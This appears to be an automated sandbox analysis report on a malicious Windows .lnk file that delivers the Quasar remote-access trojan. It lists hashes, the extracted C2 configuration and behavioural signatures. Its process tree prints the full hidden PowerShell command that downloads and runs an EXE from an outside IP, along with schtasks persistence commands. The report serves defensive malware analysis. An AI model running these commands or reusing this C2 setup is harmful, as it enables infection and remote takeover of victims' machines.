Analysis
max time kernel: 149s
max time network: 150s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 02-11-2024 02:50
Static task: static1
Behavioral task: behavioral1
Sample: 184d7427be227ca0505c4baf5a9d3756534f399b052309e19ba819d06d03a543.lnk
Resource: win7-20240903-en
General
Target: 184d7427be227ca0505c4baf5a9d3756534f399b052309e19ba819d06d03a543.lnk
Size: 2KB
MD5: 4a98c5bbf1a94992ec72858d3327a28e
SHA1: 0fa914c44bdcb63d3631d5ec30cebb5047d12c7a
SHA256: 184d7427be227ca0505c4baf5a9d3756534f399b052309e19ba819d06d03a543
SHA512: e60fb58d1f141d3c2ea99bf39d3b0dd872bebc05efa0cfa630e783f4d90b624084988c66621adc4d7dc6434b1c707d1d6c7c1f36ee2fa2e36fefc47b9a7d6ba7
Malware Config
Extracted
http://45.149.241.169:5336/ghsjfsgfjsyhsfhzgbdfbgzgfb/yugygfyjsbdfoesrjfzbhffbserhbwdewbrtsnbdjkfbrhjgvghvhgvhgvhgvHfgcNchgfcnhchgchgcnGfcngcgdcngchcngch/jhbhfbjadhghjvgfcxhhfcjtgvkhdfskjdkbzhdfhmzdkydbfvhzdfjgvhzvg/tfvjtcfgchgcgcHcgcftjcgtygvgFtrdcjfcgkhvGcjfcxhfcjgVK/chfgcx.exe
Extracted
quasar 1.3.0.0
VTROY
31.13.224.12:61512
31.13.224.13:61513
QSR_MUTEX_4Q2rJqiVyC7hohzbjx
encryption_key: 7Vp2dMCHrMjJthQ2Elyy
install_name: downloads.exe
log_directory: Logs
reconnect_delay: 5000
startup_key: cssrse.exe
subdirectory: downloadupdates
Signatures
- Quasar family
- Quasar payload (3 IoCs)
Processes:
resource / yara_rule
behavioral1/memory/1148-62-0x0000000000400000-0x000000000045E000-memory.dmp / family_quasar
behavioral1/memory/1148-61-0x0000000000400000-0x000000000045E000-memory.dmp / family_quasar
behavioral1/memory/1148-58-0x0000000000400000-0x000000000045E000-memory.dmp / family_quasar
- Blocklisted process makes network request (1 IoC)
Processes:
flow 4, pid 2820, process powershell.exe
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Runs PowerShell with the display window hidden.
- Downloads MZ/PE file
- Executes dropped EXE (8 IoCs)
Processes:
pid 3016 ujtjewc.exe
pid 1148 ujtjewc.exe
pid 2280 ujtjewc.exe
pid 992 ujtjewc.exe
pid 1696 downloads.exe
pid 1324 downloads.exe
pid 2968 downloads.exe
pid 2384 downloads.exe
- Loads dropped DLL (4 IoCs)
Processes:
pid 3016 ujtjewc.exe
pid 3016 ujtjewc.exe
pid 3016 ujtjewc.exe
pid 2280 ujtjewc.exe
- Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow 5, ioc ip-api.com
- Suspicious use of SetThreadContext (6 IoCs)
Processes:
PID 3016 (ujtjewc.exe) set thread context of 1148 (procid_target 33)
PID 3016 (ujtjewc.exe) set thread context of 2280 (procid_target 34)
PID 3016 (ujtjewc.exe) set thread context of 992 (procid_target 35)
PID 1696 (downloads.exe) set thread context of 1324 (procid_target 40)
PID 1696 (downloads.exe) set thread context of 2968 (procid_target 41)
PID 1696 (downloads.exe) set thread context of 2384 (procid_target 42)
- Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTP, 10 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language by ujtjewc.exe (4 times), downloads.exe (4 times), schtasks.exe (2 times)
- Scheduled Task/Job: Scheduled Task (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid 2004 schtasks.exe
pid 1096 schtasks.exe
- Suspicious behavior: EnumeratesProcesses (1 IoC)
Processes:
pid 2820 powershell.exe
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
Processes:
Token: SeDebugPrivilege, pid 2820 powershell.exe
Token: SeDebugPrivilege, pid 3016 ujtjewc.exe
Token: SeDebugPrivilege, pid 2280 ujtjewc.exe
Token: SeDebugPrivilege, pid 1696 downloads.exe
Token: SeDebugPrivilege, pid 2968 downloads.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
Processes (identical rows aggregated with their count):
PID 2372 (cmd.exe) wrote to memory of 2820 (procid_target 31): 3 rows
PID 2820 (powershell.exe) wrote to memory of 3016 (procid_target 32): 4 rows
PID 3016 (ujtjewc.exe) wrote to memory of 1148 (procid_target 33): 9 rows
PID 3016 (ujtjewc.exe) wrote to memory of 2280 (procid_target 34): 9 rows
PID 3016 (ujtjewc.exe) wrote to memory of 992 (procid_target 35): 9 rows
PID 2280 (ujtjewc.exe) wrote to memory of 2004 (procid_target 37): 4 rows
PID 2280 (ujtjewc.exe) wrote to memory of 1696 (procid_target 39): 4 rows
PID 1696 (downloads.exe) wrote to memory of 1324 (procid_target 40): 9 rows
PID 1696 (downloads.exe) wrote to memory of 2968 (procid_target 41): 9 rows
PID 1696 (downloads.exe) wrote to memory of 2384 (procid_target 42): 4 rows
Processes (tree; indentation shows parent/child, depth as reported)
- C:\Windows\system32\cmd.exe (PID 2372, depth 1)
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\184d7427be227ca0505c4baf5a9d3756534f399b052309e19ba819d06d03a543.lnk
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2820, depth 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hIdDEn Hiddden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('http://45.149.241.169:5336/ghsjfsgfjsyhsfhzgbdfbgzgfb/yugygfyjsbdfoesrjfzbhffbserhbwdewbrtsnbdjkfbrhjgvghvhgvhgvhgvHfgcNchgfcnhchgchgcnGfcngcgdcngchcngch/jhbhfbjadhghjvgfcxhhfcjtgvkhdfskjdkbzhdfhmzdkydbfvhzdfjgvhzvg/tfvjtcfgchgcgcHcgcftjcgtygvgFtrdcjfcgkhvGcjfcxhfcjgVK/chfgcx.exe','ujtjewc.exe');./'ujtjewc.exe';(get-item 'ujtjewc.exe').Attributes += 'Hidden';
    Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe (PID 3016, depth 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe"
      Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe (PID 1148, depth 4)
        Command line: C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe
        Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery
      - C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe (PID 2280, depth 4)
        Command line: C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe
        Signatures: Executes dropped EXE; Loads dropped DLL; System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\schtasks.exe (PID 2004, depth 5)
          Command line: "schtasks" /create /tn "cssrse.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe" /rl HIGHEST /f
          Signatures: System Location Discovery: System Language Discovery; Scheduled Task/Job: Scheduled Task
        - C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe (PID 1696, depth 5)
          Command line: "C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe"
          Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
          - C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe (PID 1324, depth 6)
            Command line: C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe
            Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery
          - C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe (PID 2968, depth 6)
            Command line: C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe
            Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
            - C:\Windows\SysWOW64\schtasks.exe (PID 1096, depth 7)
              Command line: "schtasks" /create /tn "cssrse.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe" /rl HIGHEST /f
              Signatures: System Location Discovery: System Language Discovery; Scheduled Task/Job: Scheduled Task
          - C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe (PID 2384, depth 6)
            Command line: C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe
            Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery
      - C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe (PID 992, depth 4)
        Command line: C:\Users\Admin\AppData\Local\Temp\ujtjewc.exe
        Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 774KB
MD5: b8fc2efcc33d3160f38fcb6b39319e6a
SHA1: a61413a5b6c19b4a388e6c89aaa9304c657b3e08
SHA256: 3df20b1c9806c327d72824f1b9a4ffcbe702d152fbf11fca42a36c862cbafd0a
SHA512: ba4ef7ec5dd7b9ad8ec49ef73315bded8ecc72212b11e3a1384b6d4f3f264867312cda41268a8d1df6fc8c3caa63813c15aa4ff29f0324360a95d59de3456d3b